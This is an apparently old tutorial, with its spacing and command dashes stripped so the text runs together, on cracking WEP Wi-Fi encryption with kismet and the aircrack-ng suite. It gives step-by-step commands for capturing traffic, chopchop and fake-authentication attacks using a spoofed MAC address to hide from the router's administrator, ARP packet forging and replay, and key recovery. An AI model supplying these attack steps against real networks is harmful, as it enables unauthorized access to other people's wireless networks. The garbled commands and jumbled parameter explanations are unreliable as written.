WepCrackingTutorial

Hi,inthistutorialiwillbeshowingyouhowtocrackwepwithoutanytrafficonthenetwork. Tousethistutorialyouneedtohavepacketinjectionworkingwithyourwirelesscard,kismet, aircracksuite,arpforgeandasmallamountofLinuxknowledge(toopenkonsoleandputyourcard intomonitormode) ForthistutorialihaveuseBackTrack(www.remoteexploit.org)Linuxdistributionasitcontainsall theprogramsandwaseasytoinstallpacketinjectionformydriver.

Mysetup: DellInspiron1300withanatheroswirelesscardrunningbacktrack(iwillrefertothisasBT),my DLinkDI524routerwhichhasa128Bitencryptionandnothingelseconnectedwirelessly. AfteryoubootintoBT(oranyotherdistroyourusing)putyourcardintomonitormode. startkismet,wewillusekismettofindouttheinformationwewillneedabouttheAPwewishto hack kismetwillshowallthewirelessAccessPointsinrange Ionlyhave1inrange(calledCrossover)butyoumayhavemorearoundyou.

presssthenb,thiswillletyouscrollupanddownthelisttillyoufindtheAPyouwishtocrack thenpressenter thiswillgiveyoumoreinformationabouttheaccesspoint,makeanoteofthenameofit,the channelitsonandthebssid(youcanleavekismetopenandjustcomebacktoitlatertogettheinfo) andalsomakesureitswepasthistutorialisforwep)

wewillnowrunairodumptocapturetheIV's(data)wewillneedtocrackthewep. openanewkonsoleandrun"airodumpng",thiswillshowyouallthepossibleoptionsyoucanuse withthisapplication,

weonlyneedtocapturesowewillusethew,thisiswhatwewillcallthefilewearecapturingand ctospecifyachannel,thiswillmakeiteasierforustocapturethedatafromourAP. imgoingtocallmyfile"weptutorial"andmychannel(thechannelkismetshows)is8somy commandis.wewillalsoneedtoaddtheinterfacetouseattheendofthecommand,iwconfigcan showthisbuthopefullyyouknow,mineisath1 hereisthecommandiwilluse: airodumpngwweptutorialc8ath1 weshouldseeourAPcomeupandwemighthavesometrafficonitwemightnot.

idon'thaveanydataonmine(asihavenowirelessdevicesconnectedtoit) Nowwearecapturingdata,wewillneedabout200000to1000000ofthesetocrackwep. whilethat'srunningopenanewkonsoleandnowwewillspeedupthetraffic(ifyouhavewireless devicesandthedataisgoingupfastenoughthenyoudontneedtodothisstage) wewillnowsetupamethodcalledchopchop,thisisinaireplayng(run"aireplayng"likewedid airodumpngtoseealltheoptions)anditwillcaptureanddataandresenditoverandovertomake thetrafficonthenetworksowecancapturemore. thecommandtodothisis: aireplayngchopchopb00:0F:3D:3D:94:72ath1 aireplayng chopchop b00:0F:3D:3D:94:72 showsit) ath1 =theprogramname =theattackweareuseing =ourAP'sMACaddress(kismethasthisinfoandairosumpalso =ournetworkinterface

aireplaywillkeepreadingpacketstillitfindsonethatitthinkscontainsanIV(datacontainingthe wep).Ifyournetworkhswirelesstrafficonitthenyoushouldgetonesoon,ifnot(likeme)then wecanfakeauthenticationwithAPandhopefullyitwillthrowapacketor2outthatwecancatch.

todothisweopenanotherkonsoleandusetheaireplayngcommandagainbutadifferentattack method aireplayngfakeauth50eCrossovera00:0F:3D:3D:94:72h11:22:33:44:55:66ath1 aireplayng =theprogramname fakeauth50 =theattackweareusingwiththedelayof50 eCrossover =thenameoftheAP a00:0F:3D:3D:94:72 =ourAP'sMACaddress h11:22:33:44:55:66 =afakemacaddressforustoattackfromsotheroutersadmincantseeour realmacaddress ath1 =ournetworkinterface weshouldsee SendingAuthenticationRequest Authenticationsuccessful

afterawhiletheattackwillstopbutjustrerunthecommandagain airodumpwillalsoshowournewfakemacisconnectedtotheap Hopefullythechopchopmethodwestartedwillnowcatchsomedata pressytoletitsendit,itwilldosomethinglikethisscreenshot

youwillnoticeairodumphasgonecrazytooandlotsofclientsconnectedtotheAP letitrunitsmagictillthechopchophits100%

nowwehaveacapandxorfile,wewillturnthisintoafilewecansendbacktotheAP. todothisrunanappcalledarpforgeng thiswilleditthecaptureslightly,imnotgoingtogointodetailaboutthisapp. arpforgengreplay_dec0831173203.xor100:0F:3D:3D:94:7211:22:33:44:55:66192.168.0.200 192.168.0.1arp.cap arpforgeng replay_dec0831173203.xor willbeslightlydifferent 1 00:0F:3D:3D:94:72 11:22:33:44:55:66 192.168.0.200 =theprogramname =thexorfilethatwascaughtbythechopchopmethod,yours =thetypeweareusing =theAP'smacaddress =ourfakemac =theipsource,thiscanbeanything

192.168.0.1 arp.cap afterthisitwillsaydone.

=thedestination,thisistheAP'sip =thenewcapturefilename

wewillnowsendthismodifiedcapturefilelotsoftimes,andveryfast,thiswillmakethedatain airodumpgoup. aireplaynginteractiverarp.capath1 pressywhenitasksifyouwanttosendthispacket

thedatainairodumpshouldnowberisingveryfast

atthisstageyoucanstopthefakeauthwithctrl+c. waittillyouhaveabout100000beforemovingon(thismaytakeawhile)mineisdoingabouta hundredasecondsomakeabrew.

whenithitsaround100000wecouldstarttocrackthewep,wewillleavetherestrunningand catchingdatasoitwillimproveourchances. CrackingTime openanewkonsoleandrunthecommand"aircrackng"toseeallthepossibleoptions,wewillonly beusingafew

aircracknga1eCrossoverb00:0F:3D:3D:94:72weptutorial02.cap aircrackng a1 eCrossover b00:0F:3D:3D:94:72 weptutorial02.cap =theprogramname =thisistochoosewhatwearecracking1=wep,2=wpapsk =theAPname =theapmacaddress =thisisthecapturefilethatyoucalledwhenyoustarted airodump,itwillprobadd01toyoursbutasialreadyhadone calledthatitmadeit02,justusetabtofindoutorlookinthe folder

Itisnowtestingyourkeysandhopefullythiswillfindyourkey(thiswillalsotaketime,makea sandwich)

remember,thehighertheencryptionthelongeritcantake.

iftheaircrackfailsjustrestartitandletitcatchmoredata,forthistutorialineededover800000

Thiskey(ModShackHack1)tookme1hour20minstocrack,somemaytakelesstimesomemay takemore HopeYouCrackYourWEP McScruff